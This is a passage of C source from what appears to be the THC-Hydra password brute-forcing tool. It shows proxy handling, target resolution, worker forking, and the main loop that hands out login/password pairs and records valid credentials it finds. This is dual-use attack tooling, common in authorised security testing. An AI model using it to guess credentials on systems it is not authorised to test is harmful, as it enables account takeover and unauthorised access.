(hydra_options.try_password_reverse_login)\n hydra_targets[i]->pass_state = 2;\n else\n hydra_targets[i]->pass_state = 3;\n }\n }\n } // END OF restore == 0\n\n // PROXY PROCESSING\n if (getenv(\"HYDRA_PROXY\") && use_proxy == 0) {\n printf(\"[INFO] Using Connect Proxy: %s\\n\", getenv(\"HYDRA_PROXY\"));\n use_proxy = 2;\n }\n if (use_proxy == 1)\n proxy_string = getenv(\"HYDRA_PROXY_HTTP\");\n if (use_proxy == 2)\n proxy_string = getenv(\"HYDRA_PROXY\");\n if (use_proxy && getenv(\"HYDRA_PROXY_AUTH\") != NULL)\n fprintf(stderr, \"[WARNING] environment variable HYDRA_PROXY_AUTH is \"\n \"deprecated, use authentication in the HYDRA_PROXY \"\n \"definitions, e.g. type://auth@target:port\\n\");\n if (use_proxy && proxy_string != NULL) {\n if (strstr(proxy_string, \"://\") != NULL) {\n process_proxy_line(use_proxy, proxy_string);\n } else {\n if ((proxyfp = fopen(proxy_string, \"r\")) == NULL) {\n fprintf(stderr,\n \"[ERROR] proxy definition %s is neither of the kind \"\n \"type://auth@target:port nor a file containing proxy entries!\\n\",\n proxy_string);\n exit(-1);\n }\n while (fgets(buf, sizeof(buf), proxyfp) != NULL)\n process_proxy_line(use_proxy, buf);\n fclose(proxyfp);\n }\n if (proxy_count == 0)\n bail(\"proxy defined but not valid, exiting\");\n }\n\n if (hydra_options.restore == 0) {\n if ((strcmp(hydra_options.service, \"rsh\") == 0) || (strcmp(hydra_options.service, \"oracle-sid\") == 0))\n math2 = hydra_brains.countlogin;\n else\n math2 = hydra_brains.countlogin * hydra_brains.countpass;\n\n#ifdef HAVE_MATH_H\n if (hydra_options.bfg) {\n math2 = hydra_brains.countlogin * bf_get_pcount();\n }\n#endif\n\n hydra_brains.todo = math2;\n math2 = math2 * hydra_brains.targets;\n hydra_brains.todo_all = math2;\n if (hydra_brains.todo_all == 0)\n bail(\"No login/password combination given!\");\n if (hydra_brains.todo < hydra_options.tasks) {\n if (verbose && hydra_options.tasks != TASKS)\n printf(\"[VERBOSE] More tasks defined than login/pass pairs exist. \"\n \"Tasks reduced to %\" hPRIu64 \"\\n\",\n hydra_brains.todo);\n hydra_options.tasks = hydra_brains.todo;\n }\n }\n\n if (hydra_options.max_use == MAXTASKS) { // only if it was not set via -T\n if (hydra_options.max_use < hydra_brains.targets * hydra_options.tasks)\n hydra_options.max_use = hydra_brains.targets * hydra_options.tasks;\n if (hydra_options.max_use > MAXTASKS)\n hydra_options.max_use = MAXTASKS;\n }\n if ((hydra_options.tasks == TASKS || hydra_options.tasks <= 8) && hydra_options.max_use < hydra_brains.targets * hydra_options.tasks) {\n if ((hydra_options.tasks = hydra_options.max_use / hydra_brains.targets) == 0)\n hydra_options.tasks = 1;\n // fprintf(stderr, \"[WARNING] More tasks defined per server than allowed for\n // maximal connections. Tasks per server reduced to %d.\\n\",\n // hydra_options.tasks);\n } else {\n if (hydra_options.tasks > MAXTASKS) {\n // fprintf(stderr, \"[WARNING] reducing tasks to MAXTASKS (%d)\\n\",\n // MAXTASKS);\n hydra_options.tasks = MAXTASKS;\n }\n }\n // hydra_options.max_use = hydra_brains.targets * hydra_options.tasks;\n // if (hydra_options.max_use > MAXTASKS)\n // hydra_options.max_use = MAXTASKS;\n if (hydra_options.max_use > hydra_options.tasks * hydra_brains.targets)\n hydra_options.max_use = hydra_options.tasks * hydra_brains.targets;\n math2 = (hydra_brains.todo * hydra_brains.targets) / hydra_options.max_use;\n if ((hydra_brains.todo * hydra_brains.targets) % hydra_options.max_use)\n math2++;\n\n // set options (bits!)\n options = 0;\n if (hydra_options.ssl)\n options = options | OPTION_SSL;\n\n printf(\"[DATA] max %d task%s per %d server%s, overall %d task%s, %\" hPRIu64 \" login tr\", hydra_options.tasks, hydra_options.tasks == 1 ? \"\" : \"s\", hydra_brains.targets, hydra_brains.targets == 1 ? \"\" : \"s\", hydra_options.max_use, hydra_options.max_use == 1 ? \"\" : \"s\", hydra_brains.todo);\n printf(\"%s\", hydra_brains.todo == 1 ? \"y\" : \"ies\");\n if (hydra_options.colonfile == NULL) {\n printf(\" (l:%\" hPRIu64 \"/p:%\" hPRIu64 \"), ~%\" hPRIu64 \" tr\", (uint64_t)hydra_brains.countlogin, (uint64_t)hydra_brains.countpass, math2);\n } else {\n printf(\", ~%\" hPRIu64 \" tr\", math2);\n }\n printf(\"%s\", math2 == 1 ? \"y\" : \"ies\");\n printf(\" per task\\n\");\n\n if (hydra_brains.targets == 1) {\n if (strchr(hydra_targets[0]->target, ':') == NULL) {\n printf(\"[DATA] attacking %s%s://%s:\", hydra_options.service, hydra_options.ssl == 1 ? \"s\" : \"\", hydra_targets[0]->target);\n printf(\"%d%s%s\\n\", port, hydra_options.miscptr == NULL || hydra_options.miscptr[0] != '/' ? \"/\" : \"\", hydra_options.miscptr != NULL ? hydra_options.miscptr : \"\");\n } else {\n printf(\"[DATA] attacking %s%s://[%s]:\", hydra_options.service, hydra_options.ssl == 1 ? \"s\" : \"\", hydra_targets[0]->target);\n printf(\"%d%s%s\\n\", port, hydra_options.miscptr == NULL || hydra_options.miscptr[0] != '/' ? \"/\" : \"\", hydra_options.miscptr != NULL ? hydra_options.miscptr : \"\");\n }\n } else {\n printf(\"[DATA] attacking %s%s://(%d targets):\", hydra_options.service, hydra_options.ssl == 1 ? \"s\" : \"\", hydra_brains.targets);\n printf(\"%d%s%s\\n\", port, hydra_options.miscptr == NULL || hydra_options.miscptr[0] != '/' ? \"/\" : \"\", hydra_options.miscptr != NULL ? hydra_options.miscptr : \"\");\n }\n // service %s on port %d%s\\n\", hydra_options.service, port, hydra_options.ssl\n // == 1 ? \" with SSL\" : \"\");\n // if (hydra_options.miscptr != NULL && hydra_options.miscptr[0] != 0)\n // printf(\"[DATA] with additional data %s\\n\", hydra_options.miscptr);\n\n if (hydra_options.outfile_ptr != NULL) {\n char outfile_open_type[] = \"a+\"; // Default open in a+ mode\n if (hydra_options.outfile_format == FORMAT_JSONV1 && hydra_options.restore != 1) {\n outfile_open_type[0] = 'w'; // Creat new outfile, if using JSON output and\n // not using -R. The open mode should be \"w+\".\n }\n if ((hydra_brains.ofp = fopen(hydra_options.outfile_ptr, outfile_open_type)) == NULL) {\n perror(\"[ERROR] Error creating outputfile\");\n exit(-1);\n }\n if (hydra_options.outfile_format == FORMAT_JSONV1) {\n if (hydra_options.restore != 1) { // No JSON head while using -R\n fprintf(hydra_brains.ofp,\n \"{ \\\"generator\\\": {\\n\"\n \"\\t\\\"software\\\": \\\"%s\\\", \\\"version\\\": \\\"%s\\\", \\\"built\\\": \\\"%s\\\",\\n\"\n \"\\t\\\"server\\\": \\\"%s\\\", \\\"service\\\": \\\"%s\\\", \\\"jsonoutputversion\\\": \"\n \"\\\"1.00\\\",\\n\"\n \"\\t\\\"commandline\\\": \\\"%s\",\n PROGRAM, VERSION, hydra_build_time(), hydra_options.server == NULL ? hydra_options.infile_ptr : hydra_options.server, hydra_options.service, prg);\n for (i = 1; i < argc; i++) {\n char *t = hydra_string_replace(argv[i], \"\\\"\", \"\\\\\\\"\");\n fprintf(hydra_brains.ofp, \" %s\", t);\n free(t);\n }\n fprintf(hydra_brains.ofp, \"\\\"\\n\\t},\\n\\\"results\\\": [\");\n }\n } else { // else default is plain text aka == 0\n fprintf(hydra_brains.ofp, \"# %s %s run at %s on %s %s (%s\", PROGRAM, VERSION, hydra_build_time(), hydra_options.server == NULL ? hydra_options.infile_ptr : hydra_options.server, hydra_options.service, prg);\n for (i = 1; i < argc; i++)\n fprintf(hydra_brains.ofp, \" %s\", argv[i]);\n fprintf(hydra_brains.ofp, \")\\n\");\n }\n }\n // we have to flush all writeable buffered file pointers before forking\n // set appropriate signals for mother\n signal(SIGCHLD, killed_childs);\n if (debug == 0)\n signal(SIGTERM, kill_children);\n if (debug == 0) {\n#ifdef SIGBUS\n signal(SIGBUS, kill_children);\n#endif\n signal(SIGSEGV, kill_children);\n }\n signal(SIGHUP, kill_children);\n signal(SIGINT, kill_children);\n signal(SIGPIPE, SIG_IGN);\n if (verbose)\n printf(\"[VERBOSE] Resolving addresses ... \");\n if (debug)\n printf(\"\\n\");\n\n for (i = 0; i < hydra_brains.targets; i++) {\n if (debug)\n printf(\"[DEBUG] resolving %s\\n\", hydra_targets[i]->target);\n memset(&hints, 0, sizeof(hints));\n ipv4 = NULL;\n#ifdef AF_INET6\n ipv6 = NULL;\n#endif\n if ((device = strchr(hydra_targets[i]->target, '%')) != NULL)\n *device++ = 0;\n if (getaddrinfo(hydra_targets[i]->target, NULL, &hints, &res) != 0) {\n if (use_proxy == 0) {\n if (verbose)\n printf(\"[failed for %s] \", hydra_targets[i]->target);\n else\n fprintf(stderr, \"[ERROR] could not resolve address: %s\\n\", hydra_targets[i]->target);\n hydra_targets[i]->done = TARGET_UNRESOLVED;\n hydra_brains.finished++;\n }\n } else {\n for (p = res; p != NULL; p = p->ai_next) {\n#ifdef AF_INET6\n if (p->ai_family == AF_INET6) {\n if (ipv6 == NULL)\n ipv6 = (struct sockaddr_in6 *)p->ai_addr;\n } else\n#endif\n if (p->ai_family == AF_INET) {\n if (ipv4 == NULL)\n ipv4 = (struct sockaddr_in *)p->ai_addr;\n }\n }\n#ifdef AF_INET6\n if (ipv6 != NULL && (ipv4 == NULL || prefer_ipv6)) {\n // IPV6 FIXME\n if ((strcmp(hydra_options.service, \"socks5\") == 0) || (strcmp(hydra_options.service, \"sip\") == 0)) {\n fprintf(stderr,\n \"[ERROR] Target %s resolves to an IPv6 address, however \"\n \"module %s does not support this. Maybe try \\\"-4\\\" option. \"\n \"Sending in patches helps.\\n\",\n hydra_targets[i]->target, hydra_options.service);\n hydra_targets[i]->done = TARGET_UNRESOLVED;\n hydra_brains.finished++;\n } else {\n hydra_targets[i]->ip[0] = 16;\n memcpy(&hydra_targets[i]->ip[1], (char *)&ipv6->sin6_addr, 16);\n if (device != NULL && strlen(device) <= 16)\n strcpy(&hydra_targets[i]->ip[17], device);\n if (memcmp(&hydra_targets[i]->ip[17], fe80, 2) == 0) {\n if (device == NULL) {\n fprintf(stderr,\n \"[ERROR] The target %s address is a link local address, \"\n \"link local addresses require the interface being \"\n \"defined like this: fe80::1%%eth0\\n\",\n hydra_targets[i]->target);\n exit(-1);\n }\n }\n }\n } else\n#endif\n if (ipv4 != NULL) {\n hydra_targets[i]->ip[0] = 4;\n memcpy(&hydra_targets[i]->ip[1], (char *)&ipv4->sin_addr, 4);\n } else {\n if (verbose)\n printf(\"[failed for %s] \", hydra_targets[i]->target);\n else\n fprintf(stderr, \"[ERROR] Could not resolve proxy address: %s\\n\", hydra_targets[i]->target);\n hydra_targets[i]->done = TARGET_UNRESOLVED;\n hydra_brains.finished++;\n }\n freeaddrinfo(res);\n }\n // restore device information if present (overwrite null bytes)\n if (device != NULL) {\n char *tmpptr = device - 1;\n *tmpptr = '%'; // you can ignore the compiler warning\n fprintf(stderr, \"[WARNING] not all modules support BINDTODEVICE for IPv6 \"\n \"link local addresses, e.g. SSH does not\\n\");\n }\n }\n if (verbose)\n printf(\"[VERBOSE] resolving done\\n\");\n if (hydra_brains.targets == 0)\n bail(\"No server to scan!\");\n\n#ifndef SO_BINDTODEVICE\n if (device != NULL) {\n fprintf(stderr,\n \"[ERROR] your operating system does not support SO_BINDTODEVICE or \"\n \"IP_FORCE_OUT_IFP, dunno how to bind the IPv6 address to the \"\n \"interface %s!\\n\",\n device);\n }\n#endif\n\n if (hydra_options.restore == 0) {\n hydra_heads = malloc(sizeof(hydra_head *) * hydra_options.max_use);\n target_no = 0;\n for (i = 0; i < hydra_options.max_use; i++) {\n hydra_heads[i] = malloc(sizeof(hydra_head));\n memset(hydra_heads[i], 0, sizeof(hydra_head));\n }\n }\n // here we call the init function of the relevant service module\n // should we do the init centrally or should each child do that?\n // that depends largely on the number of targets and maximum tasks\n // if (hydra_brains.targets == 1 || (hydra_brains.targets < 4 &&\n // hydra_options.tasks / hydra_brains.targets > 4 && hydra_brains.todo > 15))\n for (i = 0; i < hydra_brains.targets; i++)\n hydra_service_init(i);\n\n starttime = elapsed_status = elapsed_restore = time(NULL);\n fflush(stdout);\n fflush(stderr);\n fflush(hydra_brains.ofp);\n\n#if OPENSSL_VERSION_NUMBER >= 0x10100000L\n if (hydra_options.ssl) {\n fprintf(stderr, \"[WARNING] *****************************************************\\n\");\n fprintf(stderr, \"[WARNING] OPENSSL v1.1 development changes are active - modules \"\n \"SMB, SNMP, RDP, ORACLE LISTENER and SSL in general might not work \"\n \"properly! Please test and report to vh@thc.org.\\n\");\n fprintf(stderr, \"[WARNING] *****************************************************\\n\");\n }\n#endif\n\n hydra_debug(0, \"attack\");\n process_restore = 1;\n\n // this is the big function which starts the attacking children, feeds\n // login/password pairs, etc.!\n while (exit_condition == 0) {\n memset(&fdreadheads, 0, sizeof(fdreadheads));\n max_fd = 0;\n FD_ZERO(&fdreadheads);\n for (head_no = 0, max_fd = 1; head_no < hydra_options.max_use; head_no++) {\n if (hydra_heads[head_no]->active == HEAD_ACTIVE) {\n FD_SET(hydra_heads[head_no]->sp[0], &fdreadheads);\n if (max_fd < hydra_heads[head_no]->sp[0])\n max_fd = hydra_heads[head_no]->sp[0];\n }\n }\n my_select(max_fd + 1, &fdreadheads, NULL, NULL, 0, 200000);\n tmp_time = time(NULL);\n\n for (head_no = 0; head_no < hydra_options.max_use; head_no++) {\n if (debug > 1 && hydra_heads[head_no]->active != HEAD_DISABLED)\n printf(\"[DEBUG] head_no[%d] to target_no %d active %d\\n\", head_no, hydra_heads[head_no]->target_no, hydra_heads[head_no]->active);\n\n switch (hydra_heads[head_no]->active) {\n case HEAD_DISABLED:\n break;\n case HEAD_UNUSED:\n if (hydra_heads[head_no]->redo) {\n hydra_spawn_head(head_no, hydra_heads[head_no]->target_no);\n } else {\n if (hydra_brains.targets > hydra_brains.finished)\n hydra_heads[head_no]->target_no = hydra_select_target();\n else\n hydra_heads[head_no]->target_no = -1;\n if (debug)\n printf(\"[DEBUG] child %d got target %d selected\\n\", head_no, hydra_heads[head_no]->target_no);\n if (hydra_heads[head_no]->target_no < 0) {\n if (debug)\n printf(\"[DEBUG] hydra_select_target() reports no more targets \"\n \"left\\n\");\n hydra_kill_head(head_no, 0, 3);\n } else\n hydra_spawn_head(head_no,\n hydra_heads[head_no]->target_no); // target_no is ignored if head->redo == 1\n }\n break;\n case HEAD_ACTIVE:\n if (FD_ISSET(hydra_heads[head_no]->sp[0], &fdreadheads)) {\n do_switch = 1;\n if (hydra_options.time_next_attempt > 0) {\n if (last_attempt + hydra_options.time_next_attempt >= time(NULL)) {\n if (recv(hydra_heads[head_no]->sp[0], &rc, 1, MSG_PEEK) == 1 && (rc == 'N' || rc == 'n'))\n do_switch = 0;\n } else\n last_attempt = time(NULL);\n }\n if (do_switch) {\n readres = read_safe(hydra_heads[head_no]->sp[0], &rc, 1);\n if (readres > 0) {\n FD_CLR(hydra_heads[head_no]->sp[0], &fdreadheads);\n hydra_heads[head_no]->last_seen = tmp_time;\n if (debug)\n printf(\"[DEBUG] head_no[%d] read %c\\n\", head_no, rc);\n switch (rc) {\n // Valid Results:\n // n - mother says to itself that child requests next\n // login/password pair N - child requests next login/password\n // pair Q - child reports that it is quitting C - child reports\n // connect error (and is quitting) E - child reports protocol\n // error (and is quitting) f - child reports that the username\n // does not exist F - child reports that it found a valid\n // login/password pair\n // and requests next pair. Sends login/pw pair with next\n // msg!\n case 'N': // head wants next pair\n hydra_targets[hydra_heads[head_no]->target_no]->ok = 1;\n if (hydra_targets[hydra_heads[head_no]->target_no]->fail_count > 0)\n hydra_targets[hydra_heads[head_no]->target_no]->fail_count--;\n // no break here\n case 'n': // mother sends this to itself initially\n loop_cnt = 0;\n if (hydra_send_next_pair(hydra_heads[head_no]->target_no, head_no) == -1)\n hydra_kill_head(head_no, 1, 0);\n break;\n\n case 'F': // valid password found\n hydra_brains.found++;\n if (colored_output) {\n if (hydra_heads[head_no]->current_login_ptr == NULL || strlen(hydra_heads[head_no]->current_login_ptr) == 0) {\n if (hydra_heads[head_no]->current_pass_ptr == NULL || strlen(hydra_heads[head_no]->current_pass_ptr) == 0)\n printf(\"[\\e[1;32m%d\\e[0m][\\e[1;32m%s\\e[0m] host: \"\n \"\\e[1;32m%s\\e[0m\\n\",\n hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target);\n else\n printf(\"[\\e[1;32m%d\\e[0m][\\e[1;32m%s\\e[0m] host: \"\n \"\\e[1;32m%s\\e[0m password: \\e[1;32m%s\\e[0m\\n\",\n hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_pass_ptr);\n } else if (hydra_heads[head_no]->current_pass_ptr == NULL || strlen(hydra_heads[head_no]->current_pass_ptr) == 0) {\n printf(\"[\\e[1;32m%d\\e[0m][\\e[1;32m%s\\e[0m] host: \"\n \"\\e[1;32m%s\\e[0m login: \\e[1;32m%s\\e[0m\\n\",\n hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_login_ptr);\n } else\n printf(\"[\\e[1;32m%d\\e[0m][\\e[1;32m%s\\e[0m] host: \"\n \"\\e[1;32m%s\\e[0m login: \\e[1;32m%s\\e[0m password: \"\n \"\\e[1;32m%s\\e[0m\\n\",\n hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr);\n } else {\n if (hydra_heads[head_no]->current_login_ptr == NULL || strlen(hydra_heads[head_no]->current_login_ptr) == 0) {\n if (hydra_heads[head_no]->current_pass_ptr == NULL || strlen(hydra_heads[head_no]->current_pass_ptr) == 0)\n printf(\"[%d][%s] host: %s\\n\", hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target);\n else\n printf(\"[%d][%s] host: %s password: %s\\n\", hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_pass_ptr);\n } else if (hydra_heads[head_no]->current_pass_ptr == NULL || strlen(hydra_heads[head_no]->current_pass_ptr) == 0) {\n printf(\"[%d][%s] host: %s login: %s\\n\", hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_login_ptr);\n } else\n printf(\"[%d][%s] host: %s misc: %s login: %s password: %s\\n\", hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_targets[hydra_heads[head_no]->target_no]->miscptr, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr);\n }\n if (hydra_options.outfile_format == FORMAT_JSONV1 && hydra_options.outfile_ptr != NULL && hydra_brains.ofp != NULL) {\n fprintf(hydra_brains.ofp,\n \"%s\\n\\t{\\\"port\\\": %d, \\\"service\\\": \\\"%s\\\", \\\"host\\\": \"\n \"\\\"%s\\\", \\\"login\\\": \\\"%s\\\", \\\"password\\\": \\\"%s\\\"}\",\n hydra_brains.found == 1 ? \"\" : \",\", // prefix a comma if not first finding\n hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target != NULL ? hydra_targets[hydra_heads[head_no]->target_no]->target : \"\", hydra_heads[head_no]->current_login_ptr != NULL ? hydra_string_replace(hydra_heads[head_no]->current_login_ptr, \"\\\"\", \"\\\\\\\"\") : \"\", hydra_heads[head_no]->current_pass_ptr != NULL ? hydra_string_replace(hydra_heads[head_no]->current_pass_ptr, \"\\\"\", \"\\\\\\\"\") : \"\");\n fflush(hydra_brains.ofp);\n } else if (hydra_options.outfile_ptr != NULL && hydra_brains.ofp != NULL) { // else output format == 0 aka text\n if (hydra_heads[head_no]->current_login_ptr == NULL || strlen(hydra_heads[head_no]->current_login_ptr) == 0) {\n if (hydra_heads[head_no]->current_pass_ptr == NULL || strlen(hydra_heads[head_no]->current_pass_ptr) == 0)\n fprintf(hydra_brains.ofp, \"[%d][%s] host: %s\\n\", hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target);\n else\n fprintf(hydra_brains.ofp, \"[%d][%s] host: %s password: %s\\n\", hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_pass_ptr);\n } else if (hydra_heads[head_no]->current_pass_ptr == NULL || strlen(hydra_heads[head_no]->current_pass_ptr) == 0) {\n fprintf(hydra_brains.ofp, \"[%d][%s] host: %s login: %s\\n\", hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_login_ptr);\n } else\n fprintf(hydra_brains.ofp, \"[%d][%s] host: %s login: %s password: %s\\n\", hydra_targets[hydra_heads[head_no]->target_no]->port, hydra_options.service, hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr);\n fflush(hydra_brains.ofp);\n }\n if (hydra_options.exit_found) { // option set says quit target after on\n // valid login/pass pair is found\n if (hydra_targets[hydra_heads[head_no]->target_no]->done == TARGET_ACTIVE) {\n hydra_targets[hydra_heads[head_no]->target_no]->done = TARGET_FINISHED; // mark target as done\n hydra_brains.finished++;\n printf(\"[STATUS] attack finished for %s (valid pair found)\\n\", hydra_targets[hydra_heads[head_no]->target_no]->target);\n }\n if (hydra_options.exit_found == 2) {\n for (j = 0; j < hydra_brains.targets; j++)\n if (hydra_targets[j]->done == TARGET_ACTIVE) {\n hydra_targets[j]->done = TARGET_FINISHED;\n hydra_brains.finished++;\n }\n }\n for (j = 0; j < hydra_options.max_use; j++)\n if (hydra_heads[j]->active >= 0 && (hydra_heads[j]->target_no == target_no || hydra_options.exit_found == 2)) {\n if (hydra_brains.targets > hydra_brains.finished && hydra_options.exit_found < 2)\n hydra_kill_head(j, 1, 0); // kill all heads working on the target\n else\n hydra_kill_head(j, 1, 2); // kill all heads working on the target\n }\n continue;\n }\n // fall through\n case 'f': // username identified as invalid\n hydra_targets[hydra_heads[head_no]->target_no]->ok = 1;\n if (hydra_targets[hydra_heads[head_no]->target_no]->fail_count > 0)\n hydra_targets[hydra_heads[head_no]->target_no]->fail_count--;\n memset(buf, 0, sizeof(buf));\n read_safe(hydra_heads[head_no]->sp[0], buf, MAXBUF);\n hydra_skip_user(hydra_heads[head_no]->target_no, buf);\n fck = write(hydra_heads[head_no]->sp[1], \"n\", 1); // small hack\n break;\n\n case 'D': // disable target, unknown protocol or feature\n for (j = 0; j < hydra_brains.targets; j++)\n if (hydra_targets[j]->done == TARGET_ACTIVE) {\n hydra_targets[j]->done = TARGET_FINISHED;\n hydra_brains.finished++;\n }\n for (j = 0; j < hydra_options.max_use; j++)\n if (hydra_heads[j]->active >= 0 && hydra_heads[j]->target_no == target_no) {\n if (hydra_brains.targets > hydra_brains.finished)\n hydra_kill_head(j, 1, 0); // kill all heads working on the target\n else\n hydra_kill_head(j, 1, 2); // kill all heads working on the target\n }\n break;\n\n // we do not make a difference between 'C' and 'E' results - yet\n case 'E': // head reports protocol error\n case 'C': // head reports connect error\n fck = write(hydra_heads[head_no]->sp[0], \"Q\", 1);\n if (debug) {\n printf(\"[ATTEMPT-ERROR] target %s - login \\\"%s\\\" - pass \"\n \"\\\"%s\\\" - child %d - %\" hPRIu64 \" of %\" hPRIu64 \"\\n\",\n hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, head_no, hydra_targets[hydra_heads[head_no]->target_no]->sent, hydra_brains.todo);\n }\n hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no);\n break;\n\n case 'Q': // head reports its quitting\n fck = write(hydra_heads[head_no]->sp[0], \"Q\", 1);\n if (debug)\n printf(\"[DEBUG] child %d reported it quit\\n\", head_no);\n hydra_kill_head(head_no, 1, 0);\n break;\n\n default:\n fprintf(stderr,\n \"[ERROR] child %d sent nonsense data, killing and \"\n \"restarting it!\\n\",\n head_no);\n hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no);\n } // end switch\n } // readres\n if (readres == -1) {\n if (verbose)\n fprintf(stderr,\n \"[WARNING] child %d seems to have died, restarting \"\n \"(this only happens if a module is bad) ... \\n\",\n head_no);\n hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no);\n }\n } // end do_switch\n } else {\n if (hydra_heads[head_no]->last_seen + hydra_options.waittime > tmp_time) {\n // check if recover of timed-out head is necessary\n if (tmp_time > waittime + hydra_heads[head_no]->last_seen) {\n if (kill(hydra_heads[head_no]->pid, 0) < 0) {\n if (verbose)\n fprintf(stderr,\n \"[WARNING] child %d seems to be dead, restarting it \"\n \"...\\n\",\n head_no);\n hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no);\n }\n }\n // if we do not get to hear anything for a longer time assume its\n // dead\n if (tmp_time > waittime * 2 + hydra_heads[head_no]->last_seen) {\n if (verbose)\n fprintf(stderr, \"[WARNING] timeout from child %d, restarting\\n\", head_no);\n hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no);\n }\n }\n }\n break;\n default:\n fprintf(stderr, \"[ERROR] child %d in unknown state, restarting!\\n\", head_no);\n hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no);\n }\n }\n // if (debug) printf(\"DEBUG: bug hunt: %lu %lu\\n\", hydra_brains.todo_all,\n // hydra_brains.sent);\n\n usleepn(USLEEP_LOOP);\n (void)waitpid(-1, NULL, WNOHANG);\n // write restore file and report status\n if (process_restore == 1 && time(NULL) - elapsed_restore > 299) {\n hydra_restore_write(0);\n elapsed_restore = time(NULL);\n }\n\n if (time(NULL) - elapsed_status > status_print) {\n elapsed_status = time(NULL);\n tmp_time = elapsed_status - starttime;\n if (tmp_time < 1)\n tmp_time = 1;\n tmp_time = hydra_brains.sent / tmp_time;\n if (tmp_time < 1)\n tmp_time = 1;\n if (debug == 0) {\n if (status_print < 15 * 59)\n status_print = ((status_print + 1) * 2) - 1;\n if (status_print > 299 && ((hydra_brains.todo_all + total_redo_count) - hydra_brains.sent) / tmp_time < 1500)\n status_print = 299;\n if ((((hydra_brains.todo_all + total_redo_count) - hydra_brains.sent) / tmp_time) < 150)\n status_print = 59;\n }\n k = 0;\n for (j = 0; j < hydra_options.max_use; j++)\n if (hydra_heads[j]->active >= HEAD_UNUSED)\n k++;\n printf(\"[STATUS] %.2f tries/min, %\" hPRIu64 \" tries in %02\" hPRIu64 \":%02\" hPRIu64 \"h, %\" hPRIu64 \" to do in %02\" hPRIu64 \":%02\" hPRIu64 \"h, %d active\\n\",\n (1.0 * hydra_brains.sent) / (((elapsed_status - starttime) * 1.0) / 60), // tries/min\n hydra_brains.sent, // tries\n (uint64_t)((elapsed_status - starttime) / 3600), // hours\n (uint64_t)(((elapsed_status - starttime) % 3600) / 60), // minutes\n (hydra_brains.todo_all + total_redo_count) - hydra_brains.sent != 0 ? (hydra_brains.todo_all + total_redo_count) - hydra_brains.sent : 1, // left todo\n (uint64_t)(((double)(hydra_brains.todo_all + total_redo_count) - hydra_brains.sent) / ((double)hydra_brains.sent / (elapsed_status - starttime))) / 3600, // hours\n (((uint64_t)(((double)(hydra_brains.todo_all + total_redo_count) - hydra_brains.sent) / ((double)hydra_brains.sent / (elapsed_status - starttime))) % 3600) / 60) + 1, // min\n k);\n hydra_debug(0, \"STATUS\");\n }\n\n exit_condition = hydra_check_for_exit_condition();\n }\n\n process_restore = 0;\n if (debug)\n printf(\"[DEBUG] while loop left with %d\\n\", exit_condition);\n\n j = k = error = 0;\n for (i = 0; i < hydra_brains.targets; i++)\n switch (hydra_targets[i]->done) {\n case TARGET_UNRESOLVED:\n k++;\n break;\n case TARGET_ERROR:\n if (hydra_targets[i]->ok == 0)\n k++;\n else\n error++;\n break;\n case TARGET_FINISHED:\n break;\n case TARGET_ACTIVE:\n if (hydra_targets[i]->ok == 0)\n k++;\n else\n j++;\n break;\n default:\n error++;\n fprintf(stderr, \"[ERROR] illegal target result value (%d=>%d)\\n\", i, hydra_targets[i]->done);\n }\n\n printf(\"%d of %d target%s%scompleted, %\" hPRIu64 \" valid password\", hydra_brains.targets - j - k - error, hydra_brains.targets, hydra_brains.targets == 1 ? \" \" : \"s \", hydra_brains.found > 0 ? \"successfully \" : \"\", hydra_brains.found);\n printf(\"%s\", hydra_brains.found < 2 ? \"\" : \"s\");\n printf(\" found\\n\");\n\n error += j;\n k = 0;\n for (i = 0; i < hydra_options.max_use; i++)\n if (hydra_heads[i]->active == HEAD_ACTIVE)\n k++;\n\n if (error == 0 && k == 0) {\n process_restore = 0;\n unlink(RESTOREFILE);\n } else {\n process_restore = 1;\n if (hydra_options.cidr == 0 && k == 0) {\n printf(\"[INFO] Writing restore file because %d server scan%s could not \"\n \"be completed\\n\",\n j + error, j + error == 1 ? \"\" : \"s\");\n hydra_restore_write(1);\n } else if (k > 0) {\n printf(\"[WARNING] Writing restore file because %d final worker threads \"\n \"did not complete until end.\\n\",\n k);\n hydra_restore_write(1);\n }\n process_restore = 0;\n }\n\n if (debug)\n printf(\"[DEBUG] killing all remaining children now that might be stuck\\n\");\n for (i = 0; i < hydra_options.max_use; i++)\n if (hydra_heads[i]->active == HEAD_ACTIVE && hydra_heads[i]->pid > 0)\n 